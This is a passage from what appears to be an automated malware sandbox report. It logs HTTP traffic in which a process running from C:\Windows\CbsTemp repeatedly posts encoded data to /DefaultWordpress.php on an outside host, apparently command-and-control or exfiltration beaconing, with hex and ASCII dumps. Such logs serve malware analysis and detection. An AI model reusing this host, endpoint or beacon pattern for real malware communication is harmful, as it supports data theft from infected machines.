                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 1948
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:18:24.807457924 CEST | 1948 | OUT | Data Raw: 5e 58 5c 53 5a 5d 54 50 54 5b 52 57 50 5c 57 5c 50 50 5d 5a 50 50 57 5c 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: ^X\SZ]TPT[RWP\W\PP]ZPPW\\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#*U9%1> <3(&=> */#$>8%(0"Y')?#F $P.<
                                                          Oct 20, 2024 18:18:25.270581007 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:25.630959988 CEST | 944 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:25 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8WbyOAaMdK%2F46lNvhmNlWbkHqI33ODpEXPYxlBGwQuJ%2BCcHt32YAIK563btYSLImaVNNf9B72yp9lFHA2AZwW1gp6Nxk6lb%2Fk%2Bc%2BGN66bZD3Bua%2FWka%2FpkeJwjvfLblEvSxAkldTKA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a52db6d58967c-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=13482&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2259&delivery_rate=105179&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 39 38 0d 0a 0d 10 26 12 27 2f 05 51 29 59 38 53 3a 07 29 1e 2e 3d 05 5b 2c 31 25 5e 27 20 22 1b 31 39 31 59 32 0d 24 07 23 3c 22 12 34 01 25 1d 2e 36 28 5e 07 12 26 5c 28 3c 37 05 29 2e 2b 00 28 06 20 15 36 09 30 1c 31 3d 33 54 24 03 31 5f 2a 0f 2a 04 29 13 2a 1f 39 1a 22 1a 3a 3b 3b 00 20 2a 22 53 03 13 26 00 3e 20 01 03 35 0b 2b 59 3f 13 02 00 3c 06 31 02 3e 20 2c 02 29 38 09 5f 2f 5b 3e 58 27 01 2f 02 32 59 24 5a 26 5c 27 54 24 2a 24 5e 2d 0e 2f 57 04 36 5b 4f 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 98&'/Q)Y8S:).=[,1%^' "191Y2$#<"4%.6(^&\(<7).+( 601=3T$1_**)*9":;; *"S&> 5+Y?<1> ,)8_/[>X'/2Y$Z&\'T$*$^-/W6[O0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          25 | 192.168.2.5 | 49904 | 188.114.96.3 | 80 | 892 | C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:18:25.351983070 CEST | 287 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:25.698152065 CEST | 2528 | OUT | Data Raw: 5b 5e 5c 53 5f 5d 54 50 54 5b 52 57 50 58 57 57 50 58 5d 5d 50 50 57 5c 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [^\S_]TPT[RWPXWWPX]]PPW\\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ ]) %_%;>(U+_$8)<[>?]3=_23:$="(*#F $P.,
                                                          Oct 20, 2024 18:18:26.162507057 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:26.544259071 CEST | 776 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:26 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XhikJuauFBaQ0Y6RzGNbynJtu58wiI84FZ21T7uw2KVyfjrAbq4B3pw7rjGxoFFC3r3is3a3DvNltQZHhBo5Y0BK8BOzaN4Hy8DwHnPP6gR635rGd2lpf0tJEzIEyUVDPqufq82gbg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a52e0fbca16a6-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11493&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2815&delivery_rate=125302&cwnd=58&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a
                                                          Data Ascii: 4?X_W
                                                          Oct 20, 2024 18:18:26.544451952 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          26 | 192.168.2.5 | 49913 | 188.114.96.3 | 80 | 892 | C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:18:26.738178968 CEST | 287 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:27.088637114 CEST | 2528 | OUT | Data Raw: 5b 58 59 5c 5a 5f 51 57 54 5b 52 57 50 5f 57 51 50 5f 5d 5b 50 50 57 5c 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [XY\Z_QWT[RWP_WQP_][PPW\\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ (3%_2:?3<082=.=?<&> 11('(23=>?#F $P.0
                                                          Oct 20, 2024 18:18:27.789022923 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:27.795278072 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:28.304075956 CEST | 783 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:28 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Sma8hdC5d5%2BhuLZ3YQX7krd86bDutkYjfEzCbmygkuBW1Hh5UpOF9VyDweu2q7tKNYeZDx8JVRqlQL3%2FgDHKQ9DSg9Etm3WMCrJ%2B7cu2ERRLIjkkDjxiTkyrcBBqwygNLFhDoBQo2w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a52e9ba7096b4-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11154&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2815&delivery_rate=130028&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a
                                                          Data Ascii: 4?X_W
                                                          Oct 20, 2024 18:18:28.304095984 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0
                                                          Oct 20, 2024 18:18:28.304125071 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          27 | 192.168.2.5 | 49914 | 188.114.96.3 | 80 | 892 | C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:18:26.945271015 CEST | 310 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 540
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:18:27.291822910 CEST | 540 | OUT | Data Raw: 5e 5a 5c 5a 5f 58 54 50 54 5b 52 57 50 5f 57 52 50 51 5d 5a 50 5c 57 54 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: ^Z\Z_XTPT[RWP_WRPQ]ZP\WT\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ Y)&$;!?##]$+-V(/=,<Y$/[$!3)%=6)*#F $P.0
                                                          Oct 20, 2024 18:18:27.795231104 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:27.965095997 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:27.976411104 CEST | 788 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:27 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZeTIWy7Ijjc%2BN6bEcdQR3qRyYBsUA0q996LrTOMUjZjf7LjFCajetBGXcpgD5kdsHk8pCTlPPbhqJKqnIZUeOv7EiwBY0R7KrL%2FBdCR%2ByaASEvZqKuV6D7H1gKiKpDw%2BYuohpTvpjg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a52eaec42fb30-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=13081&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=850&delivery_rate=111745&cwnd=58&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0
                                                          Oct 20, 2024 18:18:27.980592966 CEST | 322 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: multipart/form-data; boundary=----kb7tTFdb12NMuTS2CcOxlSJ9VLjfvA7Zu8
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 3014
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:28.304153919 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:28.304368019 CEST | 3014 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 6b 62 37 74 54 46 64 62 31 32 4e 4d 75 54 53 32 43 63 4f 78 6c 53 4a 39 56 4c 6a 66 76 41 37 5a 75 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22
                                                          Data Ascii: ------kb7tTFdb12NMuTS2CcOxlSJ9VLjfvA7Zu8Content-Disposition: form-data; name="0"Content-Type: text/plain[YYY__QVT[RWP\WTP^]^PPWU\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^
                                                          Oct 20, 2024 18:18:28.696439028 CEST | 785 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:28 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y2zPWoN%2FXmsc8McDbPoZaYgdcFdfCntIAts0K6QYDJYdVt0tWkTNX3jgFdwOoYnRO21ZicHlylWMP3SRUglWjSMEzHWEqjjUDMkeybl764frb7jyNYeTwXkwfhc2tKqGJZy7Kedgdw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a52ed6e7cfb30-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=13074&sent=7&recv=12&lost=0&retrans=0&sent_bytes=838&recv_bytes=4186&delivery_rate=222375&cwnd=61&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0
                                                          Oct 20, 2024 18:18:30.636044025 CEST | 287 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 1948
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:30.810120106 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:30.810348034 CEST | 1948 | OUT | Data Raw: 5e 5d 5c 58 5f 5a 51 56 54 5b 52 57 50 5d 57 55 50 5a 5d 56 50 5c 57 5d 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: ^]\X_ZQVT[RWP]WUPZ]VP\W]\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ _>=Y1!U(+[38=- Y=/4[3.$&7_0(*%.(#F $P.
                                                          Oct 20, 2024 18:18:31.204823017 CEST | 940 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:31 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Os1YSZvhYNt1%2Flb8AV99gELJWfOgibhjqxWLVJVQZUi9eaF0F9p9XwR2A3xDDsK%2FHgf4Jl5ClL68wx29uAHbDAmC9w2zIP8uWowMdAmGU3BZE9a2IelkPqgElFhkKD915xnRZx%2BChA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a52fe0e4efb30-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=13053&sent=11&recv=18&lost=0&retrans=0&sent_bytes=1648&recv_bytes=6421&delivery_rate=222375&cwnd=64&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 39 38 0d 0a 0d 10 26 10 33 01 3b 1e 3d 2f 37 0d 3a 00 3d 51 3a 3e 34 07 2d 1f 2d 58 27 23 0f 01 26 04 25 13 26 0d 33 59 35 3c 32 5b 20 06 3d 1d 2e 26 28 5e 07 12 26 59 3f 2f 2c 5f 29 2e 28 59 2b 01 37 04 36 37 20 1c 27 3e 3b 1e 24 3d 3d 5d 3d 21 22 03 3d 04 22 55 2d 1d 2a 18 3a 06 20 11 22 3a 22 53 03 13 26 01 3d 56 37 02 21 21 23 13 28 04 24 03 2b 3b 32 5c 2a 0d 0a 04 2b 38 0e 02 2f 13 3e 10 27 3c 3b 00 26 2c 38 10 26 03 24 08 25 3a 24 5e 2d 0e 2f 57 04 36 5b 4f 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 98&3;=/7:=Q:>4--X'#&%&3Y5<2[ =.&(^&Y?/,_).(Y+767 '>;$==]=!"="U-*: ":"S&=V7!!#($+;2\*+8/>'<;&,8&$%:$^-/W6[O0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          28 | 192.168.2.5 | 49920 | 188.114.96.3 | 80 | 892 | C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:18:28.489783049 CEST | 287 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2520
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:28.838606119 CEST | 2520 | OUT | Data Raw: 5b 5a 59 5f 5f 59 51 52 54 5b 52 57 50 5a 57 5d 50 50 5d 58 50 56 57 5e 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [ZY__YQRT[RWPZW]PP]XPVW^\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#* "&;&(U'^$9(>*Y8'[213[$'==+:#F $P.
                                                          Oct 20, 2024 18:18:30.308402061 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:30.830126047 CEST | 791 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:30 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GfmlhUo5ZzGXbsaK6vDb8fieea%2BFFlfIY4u5xbktsmMadmgx2FfXBKUPCB9X6fA%2BDdjkmSidGpTlNbdiAgMUcynza%2BNMfTy%2Fwhx4Z6qbD3nHPQEmxwfjiY6KH5iO2cV3Vtu2OVd%2BWQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a52faeb6d9447-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11659&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2807&delivery_rate=126396&cwnd=58&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          29 | 192.168.2.5 | 49928 | 188.114.96.3 | 80 | 892 | C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:18:30.953440905 CEST | 287 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:31.307362080 CEST | 2528 | OUT | Data Raw: 5e 58 5c 5f 5a 5e 51 52 54 5b 52 57 50 5e 57 56 50 5f 5d 5f 50 57 57 54 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: ^X\_Z^QRT[RWP^WVP_]_PWWT\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ _*%&U(#_3V?>4*4X$>?Z21_'+9'X:?#F $P.4
                                                          Oct 20, 2024 18:18:32.026254892 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:32.027343988 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:32.109965086 CEST | 789 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:32 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5kkjxE4iUIecP2Pq5F1%2Fmz9B0Qf03a%2BFVbnueYeS4DvaWRIWduclzVSfFpcB9qaqRBw9fmnaAeiwgz7CsUd5HiH6O96%2B1oZKMdRelh%2BNQUtSlvqZHdAvJDmeME89wAafGGGpuO4p3w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a5303da8c965b-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11162&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2815&delivery_rate=130685&cwnd=56&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          30 | 192.168.2.5 | 49933 | 188.114.96.3 | 80 | 892 | C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:18:32.380475998 CEST | 287 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:32.729177952 CEST | 2528 | OUT | Data Raw: 5b 5a 5c 53 5a 5b 51 50 54 5b 52 57 50 5b 57 55 50 5a 5d 5e 50 50 57 5b 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [Z\SZ[QPT[RWP[WUPZ]^PPW[\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#(3*%;&(3(5?=8X>Y7$[,2/%('%<:#F $P.
                                                          Oct 20, 2024 18:18:33.171194077 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:33.554187059 CEST | 787 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:33 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kKwK2N98DUtL9j5vzAYm7EWO5xkiqCsQuZJFgVIwT5kiQMOHAjQ9vgSVa9Y3X6BlZcP1sTXZ7kwMdbG%2BLezhcXdl6ZBM5kmcFg2SjedUN%2FJ2pT3gReTKSiC8BJDtctvHXwosRfQF%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a530cc88417ee-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=12863&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2815&delivery_rate=112702&cwnd=68&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          31 | 192.168.2.5 | 49940 | 188.114.96.3 | 80 | 892 | C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:18:33.689393044 CEST | 311 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
